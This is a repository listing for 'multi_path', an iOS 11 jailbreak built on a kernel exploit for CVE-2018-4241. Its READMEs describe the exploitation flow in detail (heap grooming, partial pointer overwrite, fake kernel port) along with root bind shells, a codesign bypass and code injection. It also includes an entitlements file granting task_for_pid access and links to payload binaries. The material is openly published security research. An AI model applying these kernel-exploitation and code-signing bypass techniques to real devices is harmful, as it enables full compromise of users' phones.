├── README.md
├── multi_path.xcodeproj
├── project.pbxproj
├── project.xcworkspace
│ ├── contents.xcworkspacedata
│ ├── xcshareddata
│ │ └── IDEWorkspaceChecks.plist
│ └── xcuserdata
│ │ ├── ianbeer.xcuserdatad
│ │ └── UserInterfaceState.xcuserstate
│ │ └── jakejames.xcuserdatad
│ │ └── UserInterfaceState.xcuserstate
└── xcuserdata
│ ├── ianbeer.xcuserdatad
│ └── xcschemes
│ │ └── xcschememanagement.plist
│ └── jakejames.xcuserdatad
│ ├── xcdebugger
│ └── Breakpoints_v2.xcbkptlist
│ └── xcschemes
│ └── xcschememanagement.plist
└── multi_path
├── AppDelegate.h
├── AppDelegate.m
├── Assets.xcassets
└── AppIcon.appiconset
│ └── Contents.json
├── Base.lproj
├── LaunchScreen.storyboard
└── Main.storyboard
├── Info.plist
├── README
├── ViewController.h
├── ViewController.m
├── amfid_payload.dylib
├── dylibs
├── amfid_payload.dylib
└── dummypass.dylib
├── inject_criticald
├── AppSupport.tbd
├── Ent.plist
├── Makefile
├── bin
│ └── inject_criticald
├── include
│ └── AppSupport
│ │ ├── CPBitmapStore.h
│ │ └── CPDistributedMessagingCenter.h
└── inject_criticald.m
├── iosbinpack64
├── LaunchDaemons
│ ├── jailbreakd.plist
│ └── testbin.plist
├── bin
│ ├── amfidebilitate
│ ├── bash
│ ├── cat
│ ├── chmod
│ ├── cp
│ ├── date
│ ├── dd
│ ├── hostname
│ ├── jailbreakd
│ ├── jbclient
│ ├── kill
│ ├── launchctl
│ ├── launchctl_
│ ├── ln
│ ├── ls
│ ├── mkdir
│ ├── mv
│ ├── pwd
│ ├── rm
│ ├── rmdir
│ ├── rootme
│ ├── sh
│ ├── sleep
│ ├── stty
│ ├── sync
│ └── zsh
├── default.ent
├── dropbear.plist
├── etc
│ ├── alternatives
│ │ └── README
│ ├── apt
│ │ ├── sources.list.d
│ │ │ └── saurik.list
│ │ └── trusted.gpg.d
│ │ │ ├── bigboss.gpg
│ │ │ ├── modmyi.gpg
│ │ │ ├── saurik.gpg
│ │ │ └── zodttd.gpg
│ ├── motd
│ ├── profile
│ └── zshrc
├── makeMeAtHome.sh
├── profile
├── removeMe.sh
├── sbin
│ ├── dmesg
│ ├── ifconfig
│ ├── kextunload
│ ├── md5
│ ├── mknod
│ ├── ping
│ ├── shutdown
│ └── umount
├── test
└── usr
│ ├── bin
│ ├── amfid_payload.dylib
│ ├── arch
│ ├── chflags
│ ├── clear
│ ├── cut
│ ├── du
│ ├── false
│ ├── find
│ ├── fs_usage
│ ├── grep
│ ├── gunzip
│ ├── gzip
│ ├── head
│ ├── hexdump
│ ├── hostinfo
│ ├── id
│ ├── inject_criticald
│ ├── killall
│ ├── less
│ ├── login
│ ├── lsmp
│ ├── more
│ ├── nano
│ ├── nohup
│ ├── passwd
│ ├── plconvert
│ ├── printf
│ ├── renice
│ ├── reset
│ ├── sc_usage
│ ├── scp
│ ├── screen
│ ├── script
│ ├── sed
│ ├── seq
│ ├── split
│ ├── sqlite3
│ ├── stat
│ ├── syslog
│ ├── tail
│ ├── tar
│ ├── tee
│ ├── time
│ ├── true
│ ├── tset
│ ├── uicache
│ ├── uname
│ ├── vim
│ ├── vm_stat
│ ├── w
│ ├── wc
│ ├── what
│ ├── which
│ ├── xargs
│ └── xxd
│ ├── local
│ ├── bin
│ │ ├── dbclient
│ │ ├── dropbear
│ │ ├── dropbear.orig
│ │ ├── dropbearconvert
│ │ ├── dropbearkey
│ │ ├── dropbearmulti
│ │ ├── filemon
│ │ ├── jlutil
│ │ ├── joker
│ │ ├── jtool
│ │ ├── procexp
│ │ ├── procexp.ent
│ │ ├── qilin.o
│ │ ├── shaihulud
│ │ ├── shaihulud.c
│ │ └── wget
│ ├── dropbear
│ ├── dropbear.orig
│ ├── dropbearconvert
│ ├── dropbearkey
│ └── lib
│ │ └── zsh
│ │ └── 5.0.8
│ │ └── zsh
│ │ ├── attr.so
│ │ ├── cap.so
│ │ ├── clone.so
│ │ ├── compctl.so
│ │ ├── complete.so
│ │ ├── complist.so
│ │ ├── computil.so
│ │ ├── curses.so
│ │ ├── datetime.so
│ │ ├── deltochar.so
│ │ ├── example.so
│ │ ├── files.so
│ │ ├── langinfo.so
│ │ ├── mapfile.so
│ │ ├── mathfunc.so
│ │ ├── newuser.so
│ │ ├── parameter.so
│ │ ├── regex.so
│ │ ├── socket.so
│ │ ├── stat.so
│ │ ├── system.so
│ │ ├── tcp.so
│ │ ├── termcap.so
│ │ ├── terminfo.so
│ │ ├── zftp.so
│ │ ├── zle.so
│ │ ├── zleparameter.so
│ │ ├── zprof.so
│ │ ├── zpty.so
│ │ ├── zselect.so
│ │ └── zutil.so
│ ├── sbin
│ ├── chown
│ ├── ioreg
│ ├── joreg
│ ├── kextstat
│ ├── ltop
│ ├── netstat
│ ├── sysctl
│ └── taskpolicy
│ └── share
│ └── terminfo
│ ├── 61
│ ├── ansi
│ ├── ansi+arrows
│ ├── ansi+csr
│ ├── ansi+cup
│ ├── ansi+enq
│ ├── ansi+erase
│ ├── ansi+idc
│ ├── ansi+idl
│ ├── ansi+idl1
│ ├── ansi+inittabs
│ ├── ansi+local
│ ├── ansi+local1
│ ├── ansi+pp
│ ├── ansi+rca
│ ├── ansi+rep
│ ├── ansi+sgr
│ ├── ansi+sgrbold
│ ├── ansi+sgrdim
│ ├── ansi+sgrso
│ ├── ansi+sgrul
│ ├── ansi+tabs
│ ├── ansi-color-2-emx
│ ├── ansi-color-3-emx
│ ├── ansi-emx
│ ├── ansi-generic
│ ├── ansi-m
│ ├── ansi-mini
│ ├── ansi-mono
│ ├── ansi-mr
│ ├── ansi-mtabs
│ ├── ansi-nt
│ ├── ansi.sys
│ ├── ansi.sys-old
│ ├── ansi.sysk
│ ├── ansi43m
│ ├── ansi77
│ ├── ansi80x25
│ ├── ansi80x25-mono
│ ├── ansi80x25-raw
│ ├── ansi80x30
│ ├── ansi80x30-mono
│ ├── ansi80x43
│ ├── ansi80x43-mono
│ ├── ansi80x50
│ ├── ansi80x50-mono
│ ├── ansi80x60
│ ├── ansi80x60-mono
│ ├── ansil
│ ├── ansil-mono
│ ├── ansis
│ ├── ansis-mono
│ ├── ansisysk
│ └── ansiw
│ ├── 73
│ ├── screen
│ ├── screen+fkeys
│ ├── screen-16color
│ ├── screen-16color-bce
│ ├── screen-16color-bce-s
│ ├── screen-16color-s
│ ├── screen-256color
│ ├── screen-256color-bce
│ ├── screen-256color-bce-s
│ ├── screen-256color-s
│ ├── screen-bce
│ ├── screen-s
│ ├── screen-w
│ ├── screen.linux
│ ├── screen.mlterm
│ ├── screen.rxvt
│ ├── screen.teraterm
│ ├── screen.xterm-new
│ ├── screen.xterm-r6
│ ├── screen.xterm-xfree86
│ ├── screen2
│ └── screen3
│ ├── 76
│ ├── vt100
│ ├── vt100+
│ ├── vt100+enq
│ ├── vt100+fnkeys
│ ├── vt100+keypad
│ ├── vt100+pfkeys
│ ├── vt100-am
│ ├── vt100-bm
│ ├── vt100-bm-o
│ ├── vt100-bot-s
│ ├── vt100-nam
│ ├── vt100-nam-w
│ ├── vt100-nav
│ ├── vt100-nav-w
│ ├── vt100-putty
│ ├── vt100-s
│ ├── vt100-s-bot
│ ├── vt100-s-top
│ ├── vt100-top-s
│ ├── vt100-vb
│ ├── vt100-w
│ ├── vt100-w-am
│ ├── vt100-w-nam
│ ├── vt100-w-nav
│ └── vt100nam
│ ├── 78
│ └── xterm-256color
│ └── 6c
│ ├── linux
│ ├── linux-basic
│ ├── linux-c
│ ├── linux-c-nc
│ ├── linux-koi8
│ ├── linux-koi8r
│ ├── linux-lat
│ ├── linux-m
│ ├── linux-nic
│ ├── linux-vt
│ └── linux2.6.26
├── jailbreakd
├── Makefile
├── README.md
├── ent.xml
├── jailbreakd
├── jelbrek.h
├── jelbrek.m
├── kern_utils.c
├── kern_utils.h
├── kexecute.h
├── kexecute.m
├── main.m
├── make.sh
├── offsetof.c
├── offsetof.h
├── offsets.h
├── offsets.m
├── osobject.c
├── osobject.h
├── patchfinder64.h
└── patchfinder64.m
├── jelbrek
├── IOKit.tbd
├── QiLin.h
├── include
│ └── IOKit
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.c
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ ├── IOTypes.h
│ │ ├── OSMessageNotification.h
│ │ ├── Readme.md
│ │ └── screenshot.jpg
├── inject_criticald.h
├── inject_criticald.m
├── jelbrek.h
├── jelbrek.m
├── kern_utils.h
├── kern_utils.m
├── kexecute.c
├── kexecute.h
├── libjb.h
├── libjb.m
├── offsetof.c
├── offsetof.h
├── osobject.c
├── osobject.h
├── patchfinder64.h
├── patchfinder64.m
├── qilin.o
├── remap_tfp_set_hsp.c
├── remap_tfp_set_hsp.h
├── shell.c
├── shell.h
├── unlocknvram.c
└── unlocknvram.h
├── kmem.h
├── launchctl
├── AppSupport.tbd
├── Ent.plist
├── Makefile
├── include
│ └── AppSupport
│ │ ├── CPBitmapStore.h
│ │ └── CPDistributedMessagingCenter.h
└── main.m
├── main.m
├── multi_path.entitlements
├── offsets.h
├── offsets.m
├── sploit.c
├── sploit.h
└── test
/README.md:
--------------------------------------------------------------------------------
1 | # multi_path
2 |
3 | Latest update includes:
4 | - working "clear" command
5 | - working "entitle" command for jailbreakd
6 | - working launchctl (no need to platformize manually! The real launchctl binary is moved and in its place another binary uses jailbreakd to launch it platformized)
7 | - working "inject_criticald" binary (uses jailbreakd!)
8 |
9 | iOS 11.0-11.3.1 jailbreak. Gets root, escapes sandbox, patches codesign (userland only), bind shell, nvram unlock (from Electra), host_get_special_port 4 (from Electra), code injection (from Electra; injects its amfid patch after using QiLin's since it's way better), SSH (dropbear), a small jailbreakd (includes an example called "rootme", run it and if you get "uid: 0" it worked; check the README in the jailbreakd directory for more info :D)
10 |
11 | I think at this point this can be called a jailbreak, a developer-only one but with a small little feature: everything is done inside the app's bundle (except /var/dropbear, /var/profile & /var/motd) and nothing outside is touched. This makes it safe to use, without the requirement of full root read and write (although it is enabled on 11.0-11.2.6) and at the same time makes it not conflict with other jailbreaks in any way.
12 |
13 | Includes TWO root shells :)
14 |
15 | The first is via dropbear (aka SSH) and the other via netcat, in case dropbear for some reason doesn't work or you simply prefer it. You can drop any binaries in the iosbinpack64 directory. All binaries must have at least these two entitlements:
16 |
17 |
18 |
19 |
20 | platform-application
21 |
22 | com.apple.private.security.container-required
23 |
24 |
25 |
26 |
27 | LaunchDaemons are also supported, you can drop their plists in the iosbinpack64/LaunchDaemons directory and they'll get loaded on each run of the app. Type REPLACE_ME when you want to put the absolute path of iosbinpack64, like in the example provided.
28 |
29 | Future plans include: getting rid of QiLin and implementing everything I need open-source (already made progress!), and fixing remounting for 11.3.x (I guess I have no other choice than to wait for QiLin/LiberiOS/Electra)
30 |
31 | Credits to: Ian Beer for multi_path and mach_portal, Jonathan Levin for amfid patch, Jonathan Seals for find_kernel_base, Electra Team (especially stek29) and PsychoTea (@iBSparkes)
32 |
--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/multi_path.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | multi_path.xcscheme
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/multi_path.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
8 |
20 |
21 |
22 |
24 |
36 |
37 |
38 |
40 |
52 |
53 |
54 |
56 |
68 |
69 |
70 |
72 |
84 |
85 |
86 |
88 |
100 |
101 |
102 |
104 |
116 |
117 |
118 |
120 |
132 |
133 |
134 |
135 |
136 |
--------------------------------------------------------------------------------
/multi_path.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | multi_path.xcscheme
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/multi_path/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
#import <UIKit/UIKit.h>
10 |
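// Application delegate for the multi_path app (unmodified Xcode template shape).
// The protocol conformance <UIApplicationDelegate> is what lets UIApplicationMain
// deliver the lifecycle callbacks implemented in AppDelegate.m; the angle-bracket
// text was lost in this rendering and is restored here.
@interface AppDelegate : UIResponder <UIApplicationDelegate>

// The app's main window; presumably populated from Main.storyboard, which
// Info.plist names in UIMainStoryboardFile — confirm at runtime.
@property (strong, nonatomic) UIWindow *window;


@end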
17 |
18 |
--------------------------------------------------------------------------------
/multi_path/AppDelegate.m:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.m
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import "AppDelegate.h"
10 |
// Private class extension; it declares no additional properties or ivars and
// exists only because the Xcode template generates it.
@interface AppDelegate ()

@end
14 |
// Application delegate. Every UIApplicationDelegate callback below is the
// unmodified Xcode template stub: none of them does any work. The exploit
// itself is not started from here — presumably from ViewController.m / sploit.c,
// which are not shown in this listing.
@implementation AppDelegate


// Returns YES so UIKit completes the launch; nothing is configured here.
- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
// Override point for customization after application launch.
return YES;
}


// Template stub; intentionally empty.
- (void)applicationWillResignActive:(UIApplication *)application {
// Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
// Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
}


// Template stub; intentionally empty.
- (void)applicationDidEnterBackground:(UIApplication *)application {
// Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
// If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
}


// Template stub; intentionally empty.
- (void)applicationWillEnterForeground:(UIApplication *)application {
// Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
}


// Template stub; intentionally empty.
- (void)applicationDidBecomeActive:(UIApplication *)application {
// Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
}


// Template stub; intentionally empty. No cleanup of exploit state happens here.
- (void)applicationWillTerminate:(UIApplication *)application {
// Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
}


@end
52 |
--------------------------------------------------------------------------------
/multi_path/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "iphone",
5 | "size" : "20x20",
6 | "scale" : "2x"
7 | },
8 | {
9 | "idiom" : "iphone",
10 | "size" : "20x20",
11 | "scale" : "3x"
12 | },
13 | {
14 | "idiom" : "iphone",
15 | "size" : "29x29",
16 | "scale" : "2x"
17 | },
18 | {
19 | "idiom" : "iphone",
20 | "size" : "29x29",
21 | "scale" : "3x"
22 | },
23 | {
24 | "idiom" : "iphone",
25 | "size" : "40x40",
26 | "scale" : "2x"
27 | },
28 | {
29 | "idiom" : "iphone",
30 | "size" : "40x40",
31 | "scale" : "3x"
32 | },
33 | {
34 | "idiom" : "iphone",
35 | "size" : "60x60",
36 | "scale" : "2x"
37 | },
38 | {
39 | "idiom" : "iphone",
40 | "size" : "60x60",
41 | "scale" : "3x"
42 | },
43 | {
44 | "idiom" : "ipad",
45 | "size" : "20x20",
46 | "scale" : "1x"
47 | },
48 | {
49 | "idiom" : "ipad",
50 | "size" : "20x20",
51 | "scale" : "2x"
52 | },
53 | {
54 | "idiom" : "ipad",
55 | "size" : "29x29",
56 | "scale" : "1x"
57 | },
58 | {
59 | "idiom" : "ipad",
60 | "size" : "29x29",
61 | "scale" : "2x"
62 | },
63 | {
64 | "idiom" : "ipad",
65 | "size" : "40x40",
66 | "scale" : "1x"
67 | },
68 | {
69 | "idiom" : "ipad",
70 | "size" : "40x40",
71 | "scale" : "2x"
72 | },
73 | {
74 | "idiom" : "ipad",
75 | "size" : "76x76",
76 | "scale" : "1x"
77 | },
78 | {
79 | "idiom" : "ipad",
80 | "size" : "76x76",
81 | "scale" : "2x"
82 | },
83 | {
84 | "idiom" : "ipad",
85 | "size" : "83.5x83.5",
86 | "scale" : "2x"
87 | }
88 | ],
89 | "info" : {
90 | "version" : 1,
91 | "author" : "xcode"
92 | }
93 | }
--------------------------------------------------------------------------------
/multi_path/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/multi_path/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | APPL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 | LSRequiresIPhoneOS
22 |
23 | UILaunchStoryboardName
24 | LaunchScreen
25 | UIMainStoryboardFile
26 | Main
27 | UIRequiredDeviceCapabilities
28 |
29 | armv7
30 |
31 | UISupportedInterfaceOrientations
32 |
33 | UIInterfaceOrientationPortrait
34 | UIInterfaceOrientationLandscapeLeft
35 | UIInterfaceOrientationLandscapeRight
36 |
37 | UISupportedInterfaceOrientations~ipad
38 |
39 | UIInterfaceOrientationPortrait
40 | UIInterfaceOrientationPortraitUpsideDown
41 | UIInterfaceOrientationLandscapeLeft
42 | UIInterfaceOrientationLandscapeRight
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/multi_path/README:
--------------------------------------------------------------------------------
1 | multi_path - exploit for p0 issue 1558 (CVE-2018-4241)
2 | @i41nbeer
3 |
4 | mptcp_usr_connectx is the handler for the connectx syscall for the AP_MULTIPATH socket family.
5 |
6 | The logic of this function fails to correctly handle source and destination sockaddrs which aren't
7 | AF_INET or AF_INET6:
8 |
9 | //***************
10 | // verify sa_len for AF_INET:
11 |
12 | if (dst->sa_family == AF_INET &&
13 | dst->sa_len != sizeof(mpte->__mpte_dst_v4)) {
14 | mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__, dst->sa_len), MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
15 | error = EINVAL;
16 | goto out;
17 | }
18 |
19 | // verify sa_len for AF_INET6:
20 |
21 | if (dst->sa_family == AF_INET6 &&
22 | dst->sa_len != sizeof(mpte->__mpte_dst_v6)) {
23 | mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__, dst->sa_len), MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
24 | error = EINVAL;
25 | goto out;
26 | }
27 |
28 | // code doesn't bail if sa_family was neither AF_INET nor AF_INET6
29 |
30 | if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) {
31 | if (mptcp_entitlement_check(mp_so) < 0) {
32 | error = EPERM;
33 | goto out;
34 | }
35 |
36 | mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED;
37 | }
38 |
39 | // memcpy with sa_len up to 255:
40 |
41 | if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
42 | memcpy(&mpte->mpte_dst, dst, dst->sa_len);
43 | }
44 |
45 | //***************
46 |
47 | Looking around in the structure which you overflow inside you notice you can hit both fields here:
48 |
49 | if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE)
50 | _FREE(mpte->mpte_itfinfo, M_TEMP);
51 |
52 | mpte_itfinfo_size is just before mpte_itfinfo.
53 |
54 | When the structure is initialized the mpte_itfinfo pointer points to a small inline array. If more subflows are added
55 | than will fit in there they are instead put in a heap buffer, and mpte_itfinfo will point to that.
56 |
57 | If you had another bug (eg the kernel heap disclosure bug from async_wake) you could overwrite the mpte_itfinfo field
58 | with any valid zone object and it would get free'd (in fact, you could also overwrite it with an offset into that object
59 | for even more fun!)
60 |
61 | However, we don't have that.
62 |
63 | Instead another approach is to partially overwrite the pointer. If we partially overwrite it with NULL bytes we can point
64 | it to a 256 byte, 65k, 16MB or 4GB aligned value.
65 |
66 | In this exploit I choose a 3 byte NULL overwrite, which will cause a kfree of the mpte_itfinfo address rounded down to the
67 | next 16MB boundary.
68 |
69 | The exploitation flow is as follows:
70 |
71 | Allocate alternatingly 16MB of ipc_kmsgs followed by a bunch of mptcp sockets. The goal here is to get a kalloc.2048 allocation
72 | at that 16MB boundary.
73 |
74 | Use the bug to free one of the ipc_kmsgs, moving that page to the intermediate list and putting the 16MB-aligned allocation on a
75 | kalloc.2048 intermediate page freelist.
76 |
77 | Allocate a bunch of filled 2047 byte pipes; the backing buffers for these pipes will come from kalloc.2048, hopefully including our
78 | 16MB-aligned address.
79 |
80 | Trigger the bug a second time, freeing the same address and this time then allocate a bunch of preallocated ipc_kmsg buffers from
81 | kalloc.2048.
82 |
83 | Now we hopefully have an ipc_kmsg (which we can get messages sent to and then receive) and a pipe buffer (which we can read and write)
84 | overlapping each other.
85 |
86 | I use the thread exception port trick from extra_recipe to get messages sent to the prealloced ipc_kmsg buffer. Each time we check each
87 | of the pipes to see if any of them contain the message. When we find the right (ipc_kmsg,pipe) pair we can rewrite the message to send ourselves
88 | a fake port which lives inside the pipe buffer. I structure that fake port like the one from async_wake (which I based on yalu 10.2 by
89 | @qwertyoruiopz and @marcograss) to give me an early kernel read primitive.
90 |
91 | Using the kernel read primitive I find the kernel task and make a fake port which allows easier kernel memory read/write via
92 | mach_vm_read/mach_vm_write.
93 |
94 | Caveat: To connect mptcp sockets you do need the com.apple.developer.networking.multipath entitlement which requires an apple developer cert, which
95 | anyone can buy from Apple.
96 |
97 | Reliability:
98 | This is a security research tool and is faaaar from perfect. However, it should work most of the time, and when it does work it should
99 | do a good job of cleaning up so it won't panic later.
100 |
101 | To improve the probability of it working:
102 | * turn off wifi and go in to airplane mode
103 | * reboot
104 | * wait 30 seconds after restarting
105 | * run the app from xcode
106 |
107 | Supported devices:
108 | It should work on iOS 11.0 - 11.3.1 inclusive. I have tested on: iPod Touch 6g, iPhone 6s, iPhone SE, iPhone 7, iPhone 8
109 |
110 | API:
111 | #include "sploit.h" and call go() to run the exploit.
112 | If it worked you can use the functions in kmem.h to read and write kernel memory
113 |
114 | Notes:
115 | Multiple people have publicly bindiff'ed this bug from the patch (or their 0day got patched ;) read their stuff for more details:
116 | @elvanderb gave a lightning talk about the bug at rump.beer in Paris on May 31st: https://www.rump.beer/2018/slides/ios_48h.pdf
117 | @jaakerblom published a working exploit on github on June 1st: https://github.com/potmdehex/multipath_kfree
118 | John's technique is similar to mine but he does a two-byte overflow rather than a three byte one, and replaces with different objects. good stuff!
119 |
--------------------------------------------------------------------------------
/multi_path/ViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.h
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
#import <UIKit/UIKit.h>
10 |
// View controller for the app's single screen (Main.storyboard, per Info.plist).
@interface ViewController : UIViewController

// Storyboard outlet named "logs"; presumably the text view that displays log
// output while the exploit runs — confirm in ViewController.m (not shown here).
@property (weak, nonatomic) IBOutlet UITextView *logs;

@end
16 |
17 |
--------------------------------------------------------------------------------
/multi_path/amfid_payload.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/amfid_payload.dylib
--------------------------------------------------------------------------------
/multi_path/dylibs/amfid_payload.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/dylibs/amfid_payload.dylib
--------------------------------------------------------------------------------
/multi_path/dylibs/dummypass.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/dylibs/dummypass.dylib
--------------------------------------------------------------------------------
/multi_path/inject_criticald/Ent.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | platform-application
6 |
7 | get-task-allow
8 |
9 | com.apple.system-task-ports
10 |
11 | task_for_pid-allow
12 |
13 | com.apple.private.security.container-required
14 |
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/multi_path/inject_criticald/Makefile:
--------------------------------------------------------------------------------
# Builds the inject_criticald helper for arm64 iOS and pseudo-signs it with
# the entitlements listed in Ent.plist.
# NOTE(review): recipe lines must begin with a tab; the tab is not visible in
# this rendering, so confirm it survives a copy of this file.
TARGET = inject_criticald
OUTDIR ?= bin

# Cross-compile with the iphoneos SDK toolchain.
CC = xcrun -sdk iphoneos cc -arch arm64
# it is injected into trust cache by code
# which only supports sha-256 signatures
LDID = ldid2
# -Iinclude picks up the local AppSupport/ headers that declare the private
# framework classes used by inject_criticald.m.
CFLAGS = -Wall -Iinclude

.PHONY: all clean

# DEBUG=1 compiles with INJECT_CRITICALD_DEBUG defined instead of -O2.
DEBUG ?= 0
ifeq ($(DEBUG), 1)
CFLAGS += -DINJECT_CRITICALD_DEBUG
else
CFLAGS += -O2
endif

all: $(OUTDIR)/$(TARGET)

$(OUTDIR):
mkdir -p $(OUTDIR)

# Link every .m in this directory against Foundation, IOKit and the AppSupport
# .tbd stub, then sign with ldid2 -S so the binary carries Ent.plist's
# entitlements (the signature is what later gets added to the trust cache).
$(OUTDIR)/$(TARGET): *.m | $(OUTDIR)
$(CC) -o $@ $^ -framework Foundation -framework IOKit $(CFLAGS) AppSupport.tbd
$(LDID) -SEnt.plist $@

clean:
rm -f $(OUTDIR)/$(TARGET)
30 |
--------------------------------------------------------------------------------
/multi_path/inject_criticald/bin/inject_criticald:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/inject_criticald/bin/inject_criticald
--------------------------------------------------------------------------------
/multi_path/inject_criticald/include/AppSupport/CPBitmapStore.h:
--------------------------------------------------------------------------------
// Local declaration of the private AppSupport.framework class CPBitmapStore.
// The framework is linked through AppSupport.tbd (see the Makefile) and ships
// no headers, so only the one selector used here is declared.
@interface CPBitmapStore : NSObject

// NOTE(review): semantics are not visible in this header; presumably discards
// cached bitmap data — confirm against the call site in inject_criticald.m.
- (void)purge;

@end
6 |
--------------------------------------------------------------------------------
/multi_path/inject_criticald/include/AppSupport/CPDistributedMessagingCenter.h:
--------------------------------------------------------------------------------
// Local declaration of the private AppSupport.framework class
// CPDistributedMessagingCenter, a cross-process messaging API. Only the
// selectors this project needs are declared; the framework is linked via
// AppSupport.tbd (see the Makefile).
@interface CPDistributedMessagingCenter : NSObject

// Returns the center for the given name; presumably a shared instance keyed
// by name — confirm against the caller.
+ (instancetype)centerNamed:(NSString *)name;

// Server side: start/stop receiving messages on this center.
- (void)runServer;
- (void)runServerOnCurrentThread;
- (void)stopServer;

// Registers target/selector to be invoked for incoming messages named
// messageName. NOTE(review): the userInfo delivered to the selector originates
// in another process; the handler should validate it rather than trust it.
- (void)registerForMessageName:(NSString *)messageName target:(id)target selector:(SEL)selector;

// Client side, fire-and-forget; presumably returns NO when the message could
// not be delivered — confirm.
- (BOOL)sendMessageName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;

// Client side, synchronous request/reply. The error variant reports delivery
// failures through *error; the plain variant presumably returns nil on failure.
- (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
- (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo error:(NSError **)error;

@end
17 |
--------------------------------------------------------------------------------
